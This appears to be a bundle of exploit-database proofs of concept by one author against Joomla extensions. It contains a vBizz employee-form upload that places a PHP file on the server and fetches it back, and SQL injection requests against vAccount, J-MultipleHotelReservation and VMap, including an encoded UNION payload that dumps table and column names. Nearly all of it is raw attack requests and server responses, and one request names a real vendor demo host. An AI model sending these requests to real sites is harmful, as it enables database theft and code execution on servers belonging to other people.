POST /[PATH]/index.php?option=com_vbizz&view=employee HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------21301381330395
Content-Length: 3876
Referer: http://localhost/[PATH]/index.php?option=com_vbizz&view=employee&task=edit&cid[0]=60
Cookie: 84c9f7083d1056c3a8f06ae659d3db0a=9n717ao5gcu0hajds6faoqkbh3; joomla_user_state=logged_in
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
-----------------------------21301381330395
Content-Disposition: form-data; name="profile_pic"; filename="phpinfo.php"
<?php
phpinfo();
?>
-----------------------------21301381330395
Content-Disposition: form-data; name="name"
test
-----------------------------21301381330395
Content-Disposition: form-data; name="username"
test
-----------------------------21301381330395
Content-Disposition: form-data; name="password"
-----------------------------21301381330395
Content-Disposition: form-data; name="user_role"
11
-----------------------------21301381330395
Content-Disposition: form-data; name="email"
test@test.test
-----------------------------21301381330395
Content-Disposition: form-data; name="empid"
1
-----------------------------21301381330395
Content-Disposition: form-data; name="department"
5
-----------------------------21301381330395
Content-Disposition: form-data; name="designation"
6
-----------------------------21301381330395
Content-Disposition: form-data; name="phone"
-----------------------------21301381330395
Content-Disposition: form-data; name="gender"
1
-----------------------------21301381330395
Content-Disposition: form-data; name="blood_group"
A+
-----------------------------21301381330395
Content-Disposition: form-data; name="dob"
-1-11-30
-----------------------------21301381330395
Content-Disposition: form-data; name="present_address"
-----------------------------21301381330395
Content-Disposition: form-data; name="permanent_address"
-----------------------------21301381330395
Content-Disposition: form-data; name="joining_date"
-1-11-30
-----------------------------21301381330395
Content-Disposition: form-data; name="work_type"
permanent
-----------------------------21301381330395
Content-Disposition: form-data; name="payment_type"
bank
-----------------------------21301381330395
Content-Disposition: form-data; name="pan"
-----------------------------21301381330395
Content-Disposition: form-data; name="pf_ac"
0
-----------------------------21301381330395
Content-Disposition: form-data; name="bank_ac"
0
-----------------------------21301381330395
Content-Disposition: form-data; name="bank_name"
-----------------------------21301381330395
Content-Disposition: form-data; name="bank_branch"
-----------------------------21301381330395
Content-Disposition: form-data; name="ifsc"
-----------------------------21301381330395
Content-Disposition: form-data; name="leaving_date"
-1-11-30
-----------------------------21301381330395
Content-Disposition: form-data; name="amount[]"
111.00
-----------------------------21301381330395
Content-Disposition: form-data; name="payid[]"
7
-----------------------------21301381330395
Content-Disposition: form-data; name="amount[]"
0.00
-----------------------------21301381330395
Content-Disposition: form-data; name="payid[]"
8
-----------------------------21301381330395
Content-Disposition: form-data; name="amount[]"
0.00
-----------------------------21301381330395
Content-Disposition: form-data; name="payid[]"
9
-----------------------------21301381330395
Content-Disposition: form-data; name="lastIncrement"
7
-----------------------------21301381330395
Content-Disposition: form-data; name="option"
com_vbizz
-----------------------------21301381330395
Content-Disposition: form-data; name="id"
60
-----------------------------21301381330395
Content-Disposition: form-data; name="userid"
60
-----------------------------21301381330395
Content-Disposition: form-data; name="task"
apply
-----------------------------21301381330395
Content-Disposition: form-data; name="view"
employee
-----------------------------21301381330395--
HTTP/1.1 303 See other
X-Powered-By: PHP/5.6.36
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: /index.php?option=com_vbizz&view=employee&task=edit&cid[0]=60
Last-Modified: Tue, 22 Jan 2019 21:21:40 GMT
Content-Type: text/html; charset=utf-8
Server: - Web acceleration by http://target/
X-Cacheable: YES
Content-Length: 28854
Accept-Ranges: bytes
Date: Tue, 22 Jan 2019 21:21:40 GMT
X-Varnish: 561081442
Via: 1.1 varnish
Connection: keep-alive
age: 0
X-Cache: MISS
GET /components/com_vbizz/uploads/profile_pics/1548192100phpinfo.php HTTP/1.1
Host: vbizz-for-joomla.wdmtech.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: */*
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/[PATH]/index.php?option=com_vbizz&view=employee&task=edit&cid[0]=60
Cookie: 84c9f7083d1056c3a8f06ae659d3db0a=9n717ao5gcu0hajds6faoqkbh3; joomla_user_state=logged_in
DNT: 1
Connection: keep-alive
HTTP/1.1 200 OK
X-Powered-By: PHP/5.6.36
Content-Type: text/html; charset=UTF-8
Server: - Web acceleration by http://target/
X-Cacheable: YES
Content-Length: 110286
Accept-Ranges: bytes
Date: Tue, 22 Jan 2019 21:21:44 GMT
X-Varnish: 561081464
Via: 1.1 varnish
Connection: keep-alive
age: 0
X-Cache: MISS
# Exploit Title: Joomla! Component vAccount 2.0.2 - SQL Injection
# Dork: N/A
# Date: 2019-01-23
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://wdmtech.com/
# Software Link: https://extensions.joomla.org/extensions/extension/financial/cost-calculators/vaccount/
# Version: 2.0.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/vaccount-dashboard/expense?vid=[SQL]
#
GET /[PATH]/vaccount-dashboard/expense?vid=18%20%20%41%4e%44%20%45%58%54%52%41%43%54%56%41%4c%55%45%28%32%32,%43%4f%4e%43%41%54%28%30%78%35%63%2c%76%65%72%73%69%6f%6e%28%29,%28%53%45%4c%45%43%54%20%28%45%4c%54%28%31%3d%31%2c%31%29%29%29%2c%64%61%74%61%62%61%73%65%28%29%29%29%2d%2d%20%58 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: 39b5054fae6740372b1521628707bdc7=pusmhir0h1896vr6v5dvmnqd46
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 500 Internal Server Error
X-Powered-By: PHP/5.6.36
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Server: - Web acceleration by http://target/
X-Cacheable: NO: beresp.status
X-Cacheable-status: 500
Content-Length: 4216
Accept-Ranges: bytes
Date: Tue, 22 Jan 2019 21:33:56 GMT
X-Varnish: 561086750
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS
# Exploit Title: Joomla! Component J-MultipleHotelReservation 6.0.7 - SQL Injection
# Dork: N/A
# Date: 2019-01-23
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://cmsjunkie.com/
# Software Link: https://extensions.joomla.org/extensions/extension/vertical-markets/booking-a-reservations/jmultiplehotelreservation/
# Version: 6.0.7
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/j-myhotel/search-hotels?view=hotels
#
# URL-encoded value of the `rooms` parameter for the request below (the body line in the request is truncated). It decodes to
# "1-1 UNION SELECT 1,(selECt(@x)fROm(selECt(@x:=0x00),(@rUNNing_nuMBer:=0),(@tbl:=0x00),(selECt(0)fROm(infoRMATion_schEMa.coLUMns)wHEre(tABLe_schEMa=daTABase())..." —
# a single-query dump of table and column names of the current database via information_schema.columns, padded to 44 UNION columns.
%31%2d%31%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%28%73%65%6c%45%43%74%28%40%78%29%66%52%4f%6d%28%73%65%6c%45%43%74%28%40%78%3a%3d%30%78%30%30%29%2c%28%40%72%55%4e%4e%69%6e%67%5f%6e%75%4d%42%65%72%3a%3d%30%29,%28%40%74%62%6c%3a%3d%30%78%30%30%29%2c%28%73%65%6c%45%43%74%28%30%29%66%52%4f%6d%28%69%6e%66%6f%52%4d%41%54%69%6f%6e%5f%73%63%68%45%4d%61%2e%63%6f%4c%55%4d%6e%73%29%77%48%45%72%65%28%74%41%42%4c%65%5f%73%63%68%45%4d%61%3d%64%61%54%41%42%61%73%65%28%29%29%61%4e%64%28%30%78%30%30%29%69%6e%28%40%78%3a%3d%43%6f%6e%63%61%74%28%40%78%2c%69%66%28%28%40%74%62%6c%21%3d%74%41%42%4c%65%5f%6e%61%6d%65%29%2c%43%6f%6e%63%61%74%28%4c%50%41%44%28%40%72%55%4e%4e%69%6e%67%5f%6e%75%4d%42%65%72%3a=%40%72%55%4e%4e%69%6e%67%5f%6e%75%4d%42%65%72%20%31%2c%32%2c%30%78%33%30%29%2c%30%78%33%30%33%64%33%65%2c%40%74%42%6c%3a%3d%74%41%42%4c%65%5f%6e%61%4d%65%2c%28%40%7a%3a%3d%30%78%30%30%29%29%2c%20%30%78%30%30%29%2c%6c%70%61%64%28%40%7a%3a%3d%40%7a%20%31%2c%32%2c%30%78%33%30%29%2c%30%78%33%64%33%65%2c%30%78%34%62%36%66%36%63%36%66%36%65%33%61%32%30%2c%63%6f%6c%75%6d%6e%5f%6e%61%6d%65%2c%30%78%33%63%36%32%37%32%33%65%29%29%29%29%78%29%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%2c%32%39%2c%33%30%2c%33%31%2c%33%32%2c%33%33%2c%33%34%2c%33%35%2c%33%36%2c%33%37%2c%33%38%2c%33%39%2c%34%30%2c%34%31%2c%34%32%2c%34%33%2c%34%34%2d%2d%20%2d
POST /[PATH]/j-myhotel/search-hotels?view=hotels HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 985
Cookie: __cfduid=d35dbe4de0d461bf69a9165df0f9691951548240991; PHPSESSID=6c6c795380ae5a25888e1dd57e04320a; c9ffd68b334eb414c880fa254194ecbb=6053bfbb8394c9545ab2169c4399aefc
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
controller=search&task=searchHotels&year_start=2019&month_start=01&day_start=23&year_end=2019&month_end=01&hotel_id=&day_end=24&rooms=-1 UNION SELECT 1,(selECt(@x)fROm(selECt(@x: =0x00)%2c(@rUNNing_nuMBer
HTTP/1.1 200 OK
Date: Wed, 23 Jan 2019 15:14:32 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Expires: Wed, 17 Aug 2005 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Wed, 23 Jan 2019 15:14:32 GMT
Alt-Svc: h2=":443"; ma=60
Server: cloudflare
CF-RAY: 49d9d658025e22c4-LAX
# Exploit Title: Joomla! Component VMap 1.9.6 - SQL Injection
# Dork: N/A
# Date: 2019-01-23
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://wdmtech.com/
# Software Link: https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/vmap/
# Version: 1.9.6
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/index.php?option=com_vmap&task=loadmarker&latlngbound=[SQL]&mapid=1
#
GET /[PATH]/index.php?option=com_vmap&task=loadmarker&latlngbound=-40.716362432588596,40.71920853699145,-73.983044552948,-73.972959447052%20%4f%72%64%65%72%20%62%79%20%31%32%2d%2d%20%2d&mapid=1 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: 1b9dcd66a46474552f38b0164f24ac07=1dc22d621aab1d9d01c05431e9b453b3; currentURI=http%3A%2F%2Flocalhost%2Fjomsocial-profile-layout%2F709-john-dev%2Ffriends%3Fq%3D%2527%26search%3Dfriends%26option%3Dcom_community%26view%3Dfriends%26Itemid%3D526
DNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
HTTP/1.1 500 XPATH syntax error:...
Date: Tue, 22 Jan 2019 21:16:19 GMT
Server: Apache
X-Powered-By: PHP/5.6.16
X-Logged-In: False
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Cache-Control: no-cache
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked